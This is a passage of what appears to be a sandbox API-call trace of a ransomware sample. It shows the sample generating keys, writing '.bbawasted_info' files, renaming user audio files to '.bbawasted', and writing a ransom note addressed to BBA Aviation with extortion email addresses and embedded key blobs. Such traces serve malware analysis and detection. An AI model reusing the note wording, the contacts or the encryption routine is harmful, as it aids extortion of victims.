dwNumberOfBytesToMap=0x11aba) returned 0x5f0000 [0222.271] CloseHandle (hObject=0x288) returned 1 [0222.274] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.275] CloseHandle (hObject=0x27c) returned 1 [0222.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0222.276] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0222.276] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0222.276] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0222.276] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0222.277] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0222.277] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0222.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0222.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0222.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0222.338] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]l6nB0buMXvWkfSASM6n55PbCuaMOcCxHioOEFzVW+kyYW1Ypr8vVVevxCc38dJ6Q\r\n5k6qETRwdxRUHzMCs3yZa1+l2gP/ytnEyLgnQErCC9Tqm/BA3GTrTiZUapqoud4I\r\n8zLkEiF3Qw6h8kIaHwlUG5qflqoAKYy+7yZVoNsqwnW899VJL39rEhW+enm+bC35\r\nL4Oz/kLqFNwkn2pc/LEWNXu00x/s70AVSZ1rUhG4K4dicTtw4QbDWHjP/6ezRzZ7\r\n073JRG/SX/HGYTY9DUF8mviwiQ5uWGI/UrmmeNMTNlFy9jBRauC66T7mkOxO8UjL\r\n0SKoXa9wBl1NEd6Qh/1i6UTTktdL3BMB0NXYjKVf2LD/WLevKuvgPKBqJCXBU2Tq\r\nAxSiZ+mW8j29zwfZjHRLQl+B32e00ZZvP0Jf23Fz0zDRcJvPIFsrPc6Pn/IANWie\r\n1L95WDJLmdwGiSnzVA56mqYThoO639lM85/tM6hnfvwunIzESGEkr8FtkmHKcfWG\r\nfVdS1zShZ/qZS3SF0jSECnoF0WTrcbbd119TcEG+bTIMhZzWc9UZUyYpkc2Hsdn6\r\nhgdDcuu+wladUG5vkwAm820CSUlQyBLz83AXgSgWkiQOxABMxOF7g7GMtKQ45oz4\r\n+ze+2p+3omxYfQUrHxEmp56DrTNq1ow5UZqdoSCoVZS=[end_key]\r\nKEEP IT\r\n") returned 984 [0222.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0222.338] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0222.338] SetEndOfFile (hFile=0x28c) returned 1 [0222.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0222.341] CloseHandle (hObject=0x28c) returned 1 [0222.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0222.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bcbd8 | out: hHeap=0x660000) returned 1 [0222.343] _aulldvrm () returned 0x0 [0222.343] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0222.344] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0222.344] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0222.344] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\j1Nb4oMNCQBS8-S.mp3") returned 84 [0222.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b2) returned 0x6c4b88 [0222.344] lstrcpyW (in: lpString1=0x6c4c30, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0222.344] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0222.345] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0222.345] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0222.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\j1Nb4oMNCQBS8-S.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\j1nb4omncqbs8-s.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0222.345] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.347] SetEndOfFile (hFile=0x28c) returned 1 [0222.347] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0222.347] lstrcpyW (in: lpString1=0x6c4c30, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\j1Nb4oMNCQBS8-S.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\j1nb4omncqbs8-s.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\j1Nb4oMNCQBS8-S.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\j1nb4omncqbs8-s.mp3.bbawasted")) returned 1 [0222.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\j1Nb4oMNCQBS8-S.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\j1nb4omncqbs8-s.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0222.349] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0222.349] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xa32 [0222.349] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa32) returned 0x5f0000 [0222.349] CloseHandle (hObject=0x27c) returned 1 [0222.350] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.350] CloseHandle (hObject=0x288) returned 1 [0222.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0222.350] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a69b0) returned 1 [0222.351] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0222.351] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0222.351] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f10) returned 1 [0222.351] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0222.351] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0222.551] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0222.551] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0222.551] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.551] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]txOzbRDbt5R5paw1NtU97gnVCRxmH7yBskuWC/FafFQyvhGgTe0O0QKyWBzHlXos\r\nvIaF/r6WygM8ExR9YyOSugk5hMUwESwXeuvJZyD8yDBJiYf0EsnK4LTNSiFcyb/Y\r\n7ZdKRRsZSl4FhnmOIiItIISTYeQaoaUKs1dRRpZAni4oT6DTxBfkxLaUWg8TxjD6\r\nPP5UU38TYDQM1mlffn0I/m4hE4FvWlNcLaPlaoHeoYOkNS1SyVWAcE2BGi5sEFOx\r\npP14e52V+aqh1sy8KCns5fsX7+GyUQ+k9m21O+5/kw7MhtXRI7jQrHJ4nom6v+4B\r\nAaBgldSfasXPnHVe1wVqOzo53ouNAbvxcH6AvcxpE4pnIt4NhA//e4jGaOCcXYhx\r\niToYoNEVCnmcOyRKKcUPbyhBBS0xIzRtTHM63NelDh5VCB1+5Y2EdgfByv/1hT2p\r\ngf1GNTx5RlGBpEFtb637v91cRFSfWy63qSiagcFQYlZS1ai/IgwtO6ay9jtx9ZTM\r\nfkpGs+QqA2yOoT5Dlqr9UzYKt5aTrB9u55YRDiEOSFB0kWuMINdVdo97HM099Nnm\r\naCJNNmxLuJNib0QESlY1S+fJq2wd6OEMAS29qO0KcYszlAdLCQd2OpwuTurJjZT4\r\n54mPHdJPS0p5/Qr42qWz9+WKLDBHfcAD9yvIC7pHCP1=[end_key]\r\nKEEP IT\r\n") returned 984 [0222.551] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0222.551] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0222.551] SetEndOfFile (hFile=0x28c) returned 1 [0222.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.554] CloseHandle (hObject=0x28c) returned 1 [0222.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0222.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0222.554] _aulldvrm () returned 0x0 [0222.554] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0222.555] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0222.555] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0222.555] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\KTErvKWTkyMPsQr.wav") returned 59 [0222.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6bc8e0 [0222.555] lstrcpyW (in: lpString1=0x6bc956, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.555] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a64e8) returned 1 [0222.556] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0222.556] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0222.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\KTErvKWTkyMPsQr.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\ktervkwtkympsqr.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0222.557] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.558] SetEndOfFile (hFile=0x28c) returned 1 [0222.559] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.559] lstrcpyW (in: lpString1=0x6bc956, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\KTErvKWTkyMPsQr.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\ktervkwtkympsqr.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\KTErvKWTkyMPsQr.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\ktervkwtkympsqr.wav.bbawasted")) returned 1 [0222.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\KTErvKWTkyMPsQr.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\ktervkwtkympsqr.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0222.560] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0222.561] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1b77 [0222.561] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b77) returned 0x5f0000 [0222.561] CloseHandle (hObject=0x290) returned 1 [0222.562] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.562] CloseHandle (hObject=0x27c) returned 1 [0222.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6bdcf0 [0222.562] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0222.563] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x6bdd38 | out: pbBuffer=0x6bdd38) returned 1 [0222.563] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0222.563] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0222.563] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0222.563] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0222.572] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0222.572] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0222.572] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.572] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EGczXf/hEu6L/iJePob7662lBSUcV23N5UVe6DXzhXO0norbiHrK7idTp9a60xKh\r\nWEcn3hFAPem+FCpr4Gn6o0JsBwj8O7wkAQol5zTRoepaEhDq9jZfSQGFjfdPxQ9r\r\nf2nIcUYEU37MZ7W9jYWfyE3b5ukblFpxwzFxxV/HXE5igwAGcXRnfEDpUbO4M7cZ\r\nr0eunMKmoNeoF4ITwK8Vi/oNEkkyjRZ77RmAW0kNpglCG3nbwWjpvD3XLViVzG9L\r\nA16FBL9cqCaiYOJ/Rtc1AHkNgsDAU/AA/XF7wWhAs16HWQ8B7JFhp/QuloBGhHhV\r\nON+1RmYMv/KnTGn4vkqJWJo1tPQe7W2OUFIwL0PS4gsYN4vsv8DHgok+RrWt+y0+\r\n0SuSkNbkc39RVDNisANZN+lYVQ1sYuwtlR0BmoAtxwO/SXtpZyCfoGt1jTuj04Mm\r\nDe4BeZVieKhtSuWK6cy+gMpE/NzgmEXrnldMpvqemKM3mpQS8raA/L8ogLC0GAG5\r\niIcot4dKE5aa/yPe5rfxqY5mOUlbb36+f3IRv0BxlKEmHB8D4jcmowN8OT1GF7LO\r\n3Pxfdh6+C3GvDu5T1EwUyh/QTCZHwz6qpupKle7co0tcIznljKZvqgYJEek/wqTA\r\nlMrJWVR0gioLCmhCj0uX89jdqGSEpBNgeTcEkEaQSSO=[end_key]\r\nKEEP IT\r\n") returned 984 [0222.572] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0222.572] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0222.572] SetEndOfFile (hFile=0x28c) returned 1 [0222.575] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.575] CloseHandle (hObject=0x28c) returned 1 [0222.575] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0222.575] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa648 | out: hHeap=0x660000) returned 1 [0222.575] _aulldvrm () returned 0x0 [0222.575] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0222.576] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0222.576] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0222.576] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\nptv0xZLFu9hN2hUII.m4a") returned 62 [0222.576] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x286) returned 0x6bc8e0 [0222.576] lstrcpyW (in: lpString1=0x6bc95c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.576] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.576] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a69b0) returned 1 [0222.577] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0222.577] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0222.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\nptv0xZLFu9hN2hUII.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\nptv0xzlfu9hn2huii.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0222.578] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.579] SetEndOfFile (hFile=0x28c) returned 1 [0222.579] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.579] lstrcpyW (in: lpString1=0x6bc95c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\nptv0xZLFu9hN2hUII.m4a" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\nptv0xzlfu9hn2huii.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\nptv0xZLFu9hN2hUII.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\nptv0xzlfu9hn2huii.m4a.bbawasted")) returned 1 [0222.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\nptv0xZLFu9hN2hUII.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\nptv0xzlfu9hn2huii.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0222.580] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0222.580] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xd288 [0222.580] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd288) returned 0x5f0000 [0222.580] CloseHandle (hObject=0x27c) returned 1 [0222.583] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.583] CloseHandle (hObject=0x290) returned 1 [0222.583] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6bdcf0 [0222.583] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6c58) returned 1 [0222.584] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x6bdd38 | out: pbBuffer=0x6bdd38) returned 1 [0222.584] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0222.584] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0222.584] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0222.584] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0222.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0222.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0222.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.986] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE 